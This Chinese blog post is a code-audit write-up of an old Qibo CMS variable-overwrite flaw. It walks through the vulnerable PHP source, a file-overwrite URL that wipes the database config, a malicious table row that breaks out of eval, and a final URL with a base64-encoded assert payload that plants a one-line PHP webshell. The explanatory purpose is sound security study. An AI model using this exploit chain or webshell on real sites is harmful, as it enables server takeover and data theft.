齐博cms老漏洞分析

最新推荐文章于 2024-04-15 20:47:11 发布
最新推荐文章于 2024-04-15 20:47:11 发布
阅读量5.5k 收藏 3
点赞数 2
分类专栏: 代码审计
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/niexinming/article/details/53153629
版权

这天看一些经典的审计的例子,看到齐博cms的2013年的一个老洞,这个漏洞我感觉很经典,这里总结一下,记个笔记

这个漏洞是变量覆盖的漏洞

首先出问题的地方是fujsarticle.php,下面是是整个文件的内容:

<?php
error_reporting(0);extract($_GET);
require_once(dirname(__FILE__)."/../data/config.php");
if(!eregi("^(hot|com|new|lastview|like|pic)$",$type)){
	die("类型有误");
}
$fid=intval($fid);
$aid=intval($aid);
$id=intval($id);
$FileName=dirname(__FILE__)."/../cache/fujsarticle_cache/";
if($type=='like'){
	$FileName.=floor($id/3000)."/";
}else{
	unset($id);
}

$FileName.="{$type}_{$fid}_{$id}.php";
//默认缓存3分钟.
if(!$webdb["cache_time_$type"]){
	$webdb["cache_time_$type"]=3;
}
if( (time()-filemtime($FileName))<($webdb["cache_time_$type"]*60) ){
	@include($FileName);
	$show=str_replace(array("\n","\r","'"),array("","","\'"),stripslashes($show));
	if($iframeID){	//框架方式不会拖慢主页面打开速度,推荐
		//处理跨域问题
		if($webdb[cookieDomain]){
			echo "<SCRIPT LANGUAGE=\"JavaScript\">document.domain = \"$webdb[cookieDomain]\";</SCRIPT>";
		}
		echo "<SCRIPT LANGUAGE=\"JavaScript\">
		parent.document.getElementById('$iframeID').innerHTML='$show';
		</SCRIPT>";
	}else{			//JS式会拖慢主页面打开速度,不推荐
		echo "document.write('$show');";
	}
	exit;
}

require_once(dirname(__FILE__)."/global.php");

//默认缓存3分钟.
if(!$webdb["cache_time_$type"]){
	$webdb["cache_time_$type"]=3;
}

$rows>0 || $rows=7;
$leng>0 || $leng=60;

unset($SQL,$show);

//热门文章,推荐文章,最新文章
if($type=='hot'||$type=='com'||$type=='new'||$type=='lastview'||$type=='like'||$type=='pic')
{
	$erp=$Fid_db[iftable][$fid];
	if($fid)
	{
		$f_id=get_fid($fid);
		$SQL=" (".implode("OR",$f_id).") ";
	}
	else
	{
		$SQL=" 1 ";
	}

	if($type=='com')
	{
		$SQL.=" AND A.levels=1 ";
		$ORDER=' A.list ';
	}
	elseif($type=='pic')
	{
		$SQL.=" AND A.ispic=1 ";
		$ORDER=' A.list ';
	}
	elseif($type=='hot')
	{
		$ORDER=' A.hits ';
	}
	elseif($type=='new')
	{
		$ORDER=' A.list ';
	}
	elseif($type=='lastview')
	{
		$ORDER=' A.lastview ';
	}
	elseif($type=='like')
	{
		
		$SQL.=" AND A.aid!='$id' ";

		if(!$keyword)
		{
			$erp=get_id_table($id);
			extract($db->get_one("SELECT keywords AS keyword FROM {$pre}article$erp WHERE aid='$id'"));
		}

		if($keyword){
			$detail=explode(" ",$keyword);
			unset($detail2,$ids);
			foreach( $detail AS $key=>$value){
				$value && $detail2[]=" B.keywords='$value' ";
			}
			$str=implode(" OR ",$detail2);
			if($str){
				unset($ids);
				$query = $db->query("SELECT A.aid FROM {$pre}keywordid A LEFT JOIN {$pre}keyword B ON A.id=B.id WHERE $str");
				while($rs = $db->fetch_array($query)){
					$ids[]=$rs[aid];
				}
				if($ids){
					$SQL.=" AND A.aid IN (".implode(",",$ids).") ";
				}else{
					$SQL.=" AND 0 ";
				}				
			}
		}else{
			$SQL.=" AND 0 ";
		}
		
		$ORDER=' A.list ';
	}

	if(!$webdb[viewNoPassArticle]){
		$SQL.=' AND A.yz=1 ';
	}
	
	$SQL="A LEFT JOIN {$pre}fu_article FA ON A.aid=FA.aid WHERE $SQL GROUP BY A.aid ORDER BY $ORDER DESC LIMIT $rows";
	$which='A.*';
	$listdb='';
	$array=list_article($SQL,$which,$leng,$erp);
	foreach($array AS $key=>$r){
		$listdb[$r[aid]]=$r;
	}
	
	if(is_file(ROOT_PATH."template/default/$webdb[SideTitleStyle].htm")){
		$tplcode=read_file(ROOT_PATH."template/default/$webdb[SideTitleStyle].htm");
	}else{
		$tplcode=read_file(ROOT_PATH."template/default/side_tpl/0.htm");
	}
	$tplcode=addslashes($tplcode);
	foreach($listdb AS $key=>$rs)
	{
		//$target=$rs[target]?'_blank':'_self';
		$target='_blank';
		if($type=='pic'){
			$show.="<div class='p' style='float:left;width:130px;padding-left:5px;padding-top:5px;'>  <a href='bencandy.php?fid=$rs[fid]&id=$rs[aid]' style='display:block;width:120px;height:90px;border:1px solid #ccc;' target='$target'><img style='border:2px solid #fff;' width='120' height='90' src='$rs[picurl]' border='0'></a>  <A HREF='$webdb[www_url]/bencandy.php?fid=$rs[fid]&id=$rs[aid]' title='$rs[full_title]' target='$target'>$rs[title]</A>  </div>";
		}else{
			eval("\$show.=\"$tplcode\";");
		}		
	}
	if(!$show){
		$show="暂无...";
	}
}
$show=stripslashes($show);
//真静态
if($webdb[NewsMakeHtml]==1||$gethtmlurl){

	$show=make_html($show,$pagetype='N');

//伪静态
}elseif($webdb[NewsMakeHtml]==2){

	$show=fake_html($show);
}

$show=str_replace(array("\n","\r","'"),array("","","\'"),$show);

if(!is_dir(dirname($FileName))){
	makepath(dirname($FileName));
}
if( (time()-filemtime($FileName))>($webdb["cache_time_$type"]*60) ){
	write_file($FileName,"<?php \r\n\$show=stripslashes('".addslashes($show)."'); ?>");
}

if($iframeID){	//框架方式不会拖慢主页面打开速度,推荐
	//处理跨域问题
	if($webdb[cookieDomain]){
		echo "<SCRIPT LANGUAGE=\"JavaScript\">document.domain = \"$webdb[cookieDomain]\";</SCRIPT>";
	}
	echo "<SCRIPT LANGUAGE=\"JavaScript\">
	parent.document.getElementById('$iframeID').innerHTML='$show';
	</SCRIPT>";
}else{			//JS式会拖慢主页面打开速度,不推荐
	echo "document.write('$show');";
}
exit;

function get_fid($fid){
	global $db,$pre;
	$fid=intval($fid);
	$F[]=" FA.fid=$fid ";
	$query = $db->query("SELECT fid FROM {$pre}fu_sort WHERE fup='$fid'");
	while($rs = $db->fetch_array($query)){
		$F[]=" FA.fid=$rs[fid] ";
	}
	return $F;
}

?>

看到39行require_once(dirname(__FILE__)."/global.php");,这里在错误的位置引入了一个错误的文件,这个文件的引入导致下面未初始化的变量可以被覆盖,而利用的是$FileName,但是大家要问了,$FileName这个变量在上面已经初始化了呀,为什么还会被覆盖呢?

因为:

global.php文件包含的另一个文件导致问题产生:../inc/common.inc.php

这个文件我只贴出出问题的那部分:

<?php
error_reporting(7);
set_magic_quotes_runtime(0);

if(function_exists('date_default_timezone_set')){date_default_timezone_set('Hongkong');}

$speed_headtime=explode(' ',microtime());
$speed_headtime=$speed_headtime[0]+$speed_headtime[1];

if(PHP_VERSION < '4.1.0') {
	$_GET = &$HTTP_GET_VARS;
	$_POST = &$HTTP_POST_VARS;
	$_COOKIE = &$HTTP_COOKIE_VARS;
	$_SERVER = &$HTTP_SERVER_VARS;
	$_ENV = &$HTTP_ENV_VARS;
	$_FILES = &$HTTP_POST_FILES;
}


$_POST=Add_S($_POST);
$_GET=Add_S($_GET);
$_COOKIE=Add_S($_COOKIE);

function Add_S($array){
	foreach($array as $key=>$value){
		if(!is_array($value)){
			$value=str_replace("&#x","& # x",$value);	//过滤一些不安全字符
			$value=preg_replace("/eval/i","eva l",$value);	//过滤不安全函数
			!get_magic_quotes_gpc() && $value=addslashes($value);
			$array[$key]=$value;
		}else{
			$array[$key]=Add_S($array[$key]); 
		}
	}
	return $array;
}

if(!ini_get('register_globals')){
	@extract($_FILES,EXTR_SKIP);
}

foreach($_COOKIE AS $_key=>$_value){
	unset($$_key);
}
foreach($_POST AS $_key=>$_value){
	!ereg("^\_[A-Z]+",$_key) && $$_key=$_POST[$_key];
}
foreach($_GET AS $_key=>$_value){
	!ereg("^\_[A-Z]+",$_key) && $$_key=$_GET[$_key];
}

define('WEB_LANG','gb2312');		//utf-8 gb2312 big5
define('ROOT_PATH', substr(dirname(__FILE__), 0, -4).'/');
define('PHP168_PATH', ROOT_PATH);	//兼容旧程序

$qibosoft_Edition="V7.0Final";

ob_start();		//ob_start('ob_gzhandler');
header('Content-Type: text/html; charset='.WEB_LANG);

$page && $page = intval($page);
$id && $id = intval($id);
$aid && $aid = intval($aid);
$rid && $rid = intval($rid);
$fid && $fid = intval($fid);
$cid && $cid = intval($cid);
if(!defined('IS_ADMIN'))unset($listdb,$array,$rs);
unset($webdb,$Html_Type,$erp,$ltitle,$memberlevel,$showHtml_Type,$chdb,$fidDB,$rsdb,$ModuleDB,$city_DB,$Mdomain,$Murl,$choose_class,$foot_tpl,$head_tpl);
require(ROOT_PATH.'data/config.php');

主要的地方是: 

foreach($_COOKIE AS $_key=>$_value){
	unset($$_key);
}
foreach($_POST AS $_key=>$_value){
	!ereg("^\_[A-Z]+",$_key) && $$_key=$_POST[$_key];
}
foreach($_GET AS $_key=>$_value){
	!ereg("^\_[A-Z]+",$_key) && $$_key=$_GET[$_key];
}

我写了个小程序来验证上面那几行代码的魔力:

<?php
$aaa=1232413;
echo "进入之前:".$aaa;
echo "<br>";
//--------------------邪恶代码分割线------------------------------------
foreach($_COOKIE AS $_key=>$_value){
	unset($$_key);
}
foreach($_POST AS $_key=>$_value){
	!preg_match("/^\_[A-Z]+/",$_key) && $$_key=$_POST[$_key];
}
foreach($_GET AS $_key=>$_value){
	!preg_match("/^\_[A-Z]+/",$_key) && $$_key=$_GET[$_key];
}
//--------------------邪恶代码分割线------------------------------------

$aaa;

echo "进入之后:".$aaa;
echo "<br>";


访问:http://localhost/test.php?aaa=testtest

结果是:

进入之前:1232413进入之后:testtest

发现虽然$aaa虽然在最开始的时候初始化了,但是邪恶代码下面没有再次初始化的话就会被邪恶代码传进来的参数覆盖掉

fujsarticle.php也一样的道理,理解上面的实验程序之后,发现39行代码(require_once(dirname(__FILE__)."/global.php");)下面的$FileName没有被再次初始化,然后后面的$FileName就可以被控制,最后$FileName被传递到了174行(write_file($FileName,"<?php \r\n\$show=stripslashes('".addslashes($show)."'); ?>");)

这样就可以覆盖任意文件了,这里我们要覆盖的文件是:/data/mysql_config.php

访问这样的链接:http://xxxxxxx/do/fujsarticle.php?type=like&FileName=../data/mysql_config.php&submit=123  就可以把/data/mysql_config.php 覆盖为<?php $show=stripslashes(’暂无...‘); ?>

这样,网站就的数据库配置文件就被覆盖了,有漏洞的网站就会显示数据库连接错误

这个就为我们下面的利用创造了条件:

下面的被利用的文件是:/do/jf.php

下面是jf.php的内容:

<?php
require(dirname(__FILE__)."/"."global.php");


$lfjdb && $lfjdb[money]=get_money($lfjdb[uid]);

$query = $db->query("SELECT * FROM {$pre}jfsort ORDER BY list");
while($rs = $db->fetch_array($query)){
	$fnameDB[$rs[fid]]=$rs[name];
	$query2 = $db->query("SELECT * FROM {$pre}jfabout WHERE fid='$rs[fid]' ORDER BY list");
	while($rs2 = $db->fetch_array($query2)){
		eval("\$rs2[title]=\"$rs2[title]\";");
		eval("\$rs2[content]=\"$rs2[content]\";");
		$jfDB[$rs[fid]][]=$rs2;
	}
}

require(ROOT_PATH."inc/head.php");
require(html("jf"));
require(ROOT_PATH."inc/foot.php");

?>

这里在12行和13行看到,数据库把查询出的数据库直接放入eval这个函数中,

因为数据库配置文件被覆盖成无效的文件,所以邪恶代码下面的数据库配置变量,包括数据库地址,数据库用户名,数据库用户密码等都变成了未初化的变量,这些变量就能被任意覆盖,这个我们就可以让网站连接我们自己的数据库服务器,只要数据库的表:qb_jfabout包含恶意代码就可以拿到shell了

首先我们先在我们自己的数据库中创建两个表:

qb_jfabout:

id  |  fid  |  list  | title                                          |  content

1   |  1    |   1    |  "+$_GET[a]($_GET[b]);+"  |  "+$_GET[a]($_GET[b]);+"


qb_jfsort:

id  |  fid  |  name  |  list

1   |  1    |  1          |  1


关于eval函数有个坑:

首先观察下面的例子:

<?php
$string = "beautiful";
$time = "winter";

$str = 'This is a $string $time morning!';
echo $str. "<br />";

eval("\$str = \"$str\";");
echo $str;
?>

输出是: 

This is a $string $time morning!
This is a beautiful winter morning!

也就是说,字符串输出在双引号之内的,eval都会将其看成为普通的字符串,但是输出在双引号之外的就会当成代码来执行

所以我放在数据库的恶意代码是:"+$_GET[a]($_GET[b]);+"  ,目的是闭合前面的双引号,然后执行代码,再闭合后面的双引号

最后我访问:

http://xxxxxxxxx/do/jf.php?dbuser=自己的数据库用户名&dbhost=自己的数据库地址&dbpw=自己的数据库密码&dbname=自己数据库创建的数据库名&pre=qb_&dbcharset=gbk&submit=123&a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};


访问之后就会在/do目录下生成一个一句话木马c.php

niexinming
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PHP代码执行漏洞总结
ask every day
04-23 3495
PHP代码执行漏洞总结ref : http://blog.csdn.net/kuangmang/article/details/27170309ref : http://blog.csdn.net/fuckcat_2333/article/details/521259511 代码执行函数php中可以执行代码的函数有: eval()、assert()、``、system()、exec()、shell...
齐博cms漏洞分析
weixin_34007906的博客
08-18 564
** 0x01 原理分析 **还是很早之前爆出来的漏洞,现在拿出来学习一下,参考阿里巴巴:https://security.alibaba.com/...漏洞发生在/inc/common.inc.php页面中。首先看这个函数: 首先使用ini_get来获取php.ini中变量'register_globals'的值,而register_g...
php代码审计【23】齐博CMS通杀漏洞漏洞
司徒荆的博客
07-09 2072
齐博CMS通杀漏洞漏洞
Web安全 EmpireCMS漏洞常见漏洞分析复现,2024年最新三幅图给你弄懂EventBus核心原理
最新发布
qq194582923的博客
04-15 1273
我们知道secure_file_priv这个参数在mysql的配置文件里起到的是能否写入的作用,当secure_file_priv = 为空,则可以写入sql语句到数据库,当secure_file_priv = NULL,则不可以往数据库里写sql语句,当secure_file_priv = /xxx,一个指定目录的时候,就只能往这个指定的目录里面写东西。技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。
齐博CMSV7任意文件读取漏洞批量测试POC
m0_46371267的博客
04-22 1392
注:本poc为自己编写,请勿用于非法用途,第一次写poc,如有不妥请联系我。 # -*- coding:utf-8 -*- import requests import re import urllib import base64 def dakai(filename): with open(filename,'r',encoding='utf-8') as fp: # url_list = [] # for i in fp.readlines():
齐博CMS变量覆盖漏洞exp
热门推荐
Exploit的小站~
05-10 1万+
 漏洞的具体分析在 http://security.alibaba.com/blog/blog.htm?spm=0.0.0.0.AooULy&id=13,下面公布一下我写的漏洞利用以及exp。 利用步骤如下: (1)首先访问/member下面的“评论管理”功能,抓包 (2)在httprequest中构造一个attachment,如下: POST /qibo/mem...
php代码审计【25】齐博CMS 无限制put 漏洞
司徒荆的博客
07-12 765
齐博CMS 无限制put 漏洞 无限制put
qibov7sql注入漏洞通杀
01-08
qibov7sql注入漏洞通杀
齐博CMS V7任意文件下载漏洞
09-07
# 齐博CMS V7任意文件下载漏洞 ## 漏洞影响 ``` 齐博cms V7 ``` ## FOFA ``` app="齐博cms" ``` ## Poc 综合验证和利用脚本见 Qibo_v7.py
齐博CMS X1.0
10-10
齐博CMS中,它可能被用来优化SEO(搜索引擎优化)或者增强站点的安全性,比如防止未授权的目录访问。 `说明.htm` 可能包含了关于系统安装、配置以及使用的基本指南,是新用户快速上手的参考文档。它通常会包含...
齐博CMS企业版建站系统 v2.0
11-30
9. **安全与维护**:齐博CMS企业版会定期更新,修复安全漏洞,确保网站的数据安全,同时提供技术支持和故障排查服务。 从提供的压缩包文件名称列表来看,"下载说明.htm"和"易采源码下载说明.txt"很可能是系统安装和...
齐博CMS(原PHP168整站) v7.0 正式版 GBK.rar
07-09
齐博CMS系统,原PHP168整站系统是国内开源CMS系统中较全面的产品,提供了包括文章、图片、下载、商场、内置专题、订单、考试等多种模块,适合二次开发,此外用户可以在后台对页面进行可视化标签调用。模板制作较简单...
php代码审计【24】齐博CMS xss 漏洞漏洞
司徒荆的博客
07-12 956
齐博CMS xss 漏洞漏洞
齐博 php7,齐博cmsv7.0后台getshell
weixin_31417135的博客
03-25 684
0x01 漏洞分析漏洞比较鸡肋,需要后台权限。漏洞原理很简单,这里就简单分析一下。漏洞出现在:inc/class.inc.php中的GuideFidCache函数里/*导航条缓存*/function GuideFidCache($table,$filename="guide_fid.php",$TruePath=0){global $db,$webdb,$pre;if($table=="{$pr...
齐博cmsv7.0后台getshell
vspiders的博客
04-05 3109
前言预测下,VG要夺冠。加油0x01 漏洞分析漏洞比较鸡肋,需要后台权限。漏洞原理很简单,这里就简单分析一下。漏洞出现在:inc/class.inc.php中的GuideFidCache函数里 /*导航条缓存*/ function GuideFidCache($table,$filename="guide_fid.php",$TruePath=0){ global ...
齐博CMS1.0全版本的sql注入漏洞
wanwan的博客
04-03 3349
详见:http://dingody.iteye.com/blog/2195864这里只说一下最后的利用,还是使用原作者指出的那个注入点,虽然value值保存在了两个sql语句里面,这两个语句的列不一样,如果利用第二个语句,会在第一个语句的时候报列不一致的错误;尝试利用第一个语句。我构造的语句是  1' union select password from qibosoft_members;#这里最...
齐博1.0全版本后台getshell漏洞复现
wanwan的博客
04-02 1767
思路整理并详细说明了一下01用户登陆判断的地方admin/global.php在用户不存在地方呢执行了一个eval():eval(base64_decode("Y$webdb[_Notice]"));该参数打印出来:copy("http://www.php168.com/Notice/?url=$webdb[www_url]",PHP168_PATH."cache/Notice.php");将一个...
齐博cms最新SQL注入网站漏洞 可远程执行代码提权
weixin_33737134的博客
10-25 950
齐博cms整站系统,是目前建站系统用的较多的一款CMS系统,开源,免费,第三方扩展化,界面可视化的操作,使用简单,便于新手使用和第二次开发,受到许多站长们的喜欢。开发架构使用的是php语言以及mysql数据库,强大的网站并发能力。于近日,我们SINE安全公司发现齐博cms又爆出高危的sql注入漏洞,关于该网站漏洞的详情,我们来详细的分析漏洞的产生以及如何...
齐博X1教程二(阿赖耶识与随风提供)-03041124.pdf
02-17
9. **数据转换**:教程还涉及其他CMS系统(如水平凡、lvyecms)向齐博X1的数据转换,方便用户迁移原有内容。 10. **模型字段内容页面调用**:针对内容模型的字段,教程给出了如何在页面上进行有效调用的技巧,以...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值